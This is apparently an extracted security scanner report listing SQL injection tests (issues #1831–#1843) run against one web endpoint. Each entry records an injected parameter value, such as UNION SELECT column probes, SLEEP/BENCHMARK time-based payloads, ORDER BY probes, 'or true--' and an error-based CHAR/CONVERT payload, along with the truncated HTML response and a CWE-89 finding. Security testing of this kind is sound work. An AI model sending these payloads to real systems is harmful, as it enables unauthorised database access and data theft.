https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1831\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL\n,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1832\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\n#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1833\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1834\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" or sleep(5)=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1835\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"\n81dc9bdb52d04dc20036dbd8313ed055\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1836\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or true--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1837\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1838\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1839\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1840\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1841\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 28\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1842\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1843\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found 